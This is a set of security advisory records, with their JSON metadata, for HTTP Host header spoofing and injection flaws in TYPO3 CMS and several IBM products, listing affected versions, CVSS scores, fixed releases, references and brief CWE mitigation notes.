It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP Host header. TYPO3 uses the HTTP Host header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.
This vulnerability is the same as described in TYPO3-CORE-SA-2014-001 (CVE-2014-3941). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting $GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern'] (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.
Solution
Update your instance to TYPO3 version 11.5.0 which addresses the problem described.
Credits
Thanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue.
References
- TYPO3-CORE-SA-2021-015
- CVE-2014-3941 reintroduced in TYPO3 v11.0.0
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-41114"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-644"
],
"github_reviewed": true,
"github_reviewed_at": "2021-10-05T18:47:01Z",
"nvd_published_at": "2021-10-05T18:15:00Z",
"severity": "MODERATE"
},
"details": "### Meta\n* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5)\n\n### Problem\nIt has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.\n\nThis vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS[\u0027TYPO3_CONF_VARS\u0027][\u0027SYS\u0027][\u0027trustedHostsPattern\u0027]_ (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.\n\n### Solution\nUpdate your instance to TYPO3 version 11.5.0 which addresses the problem described.\n\n### Credits\nThanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-015](https://typo3.org/security/advisory/typo3-core-sa-2021-015)\n* [CVE-2014-3941](https://nvd.nist.gov/vuln/detail/CVE-2014-3941) reintroduced in TYPO3 v11.0.0",
"id": "GHSA-m2jh-fxw4-gphm",
"modified": "2021-10-05T18:47:01Z",
"published": "2021-10-05T20:23:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-m2jh-fxw4-gphm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3941"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41114"
},
{
"type": "WEB",
"url": "https://github.com/TYPO3/typo3/commit/5cbff85506cebe343e5ae59228977547cf8e3cf4"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-41114.yaml"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-41114.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3/typo3"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-core-sa-2021-015"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "HTTP Host Header Injection"
}
GHSA-MW36-6R6X-GRR2
Vulnerability from github – Published: 2025-04-14 21:32 – Updated: 2025-04-14 21:32IBM Aspera Console 3.4.0 through 3.4.4
is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.
{
"affected": [],
"aliases": [
"CVE-2022-43847"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-14T21:15:16Z",
"severity": "MODERATE"
},
"details": "IBM Aspera Console 3.4.0 through 3.4.4 \n\nis vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.",
"id": "GHSA-mw36-6r6x-grr2",
"modified": "2025-04-14T21:32:24Z",
"published": "2025-04-14T21:32:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43847"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7169766"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P4V4-3MFQ-FFJR
Vulnerability from github – Published: 2026-06-11 18:31 – Updated: 2026-06-11 18:31IBM DevOps Plan 3.0.0 through 3.0.6 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking
{
"affected": [],
"aliases": [
"CVE-2026-4096"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-11T16:16:24Z",
"severity": "MODERATE"
},
"details": "IBM DevOps Plan 3.0.0 through 3.0.6 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking",
"id": "GHSA-p4v4-3mfq-ffjr",
"modified": "2026-06-11T18:31:34Z",
"published": "2026-06-11T18:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4096"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7275005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-P56Q-W8C2-56V9
Vulnerability from github – Published: 2026-04-02 00:31 – Updated: 2026-04-02 00:31IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.
{
"affected": [],
"aliases": [
"CVE-2025-66485"
],
"database_specific": {
"cwe_ids": [
"CWE-644"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-01T23:17:02Z",
"severity": "MODERATE"
},
"details": "IBM Aspera Shares 1.9.9 through 1.11.0 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. \u00a0This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.",
"id": "GHSA-p56q-w8c2-56v9",
"modified": "2026-04-02T00:31:04Z",
"published": "2026-04-02T00:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66485"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7267848"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header.
Mitigation
Disable script execution functionality in the clients' browser.
No CAPEC attack patterns related to this CWE.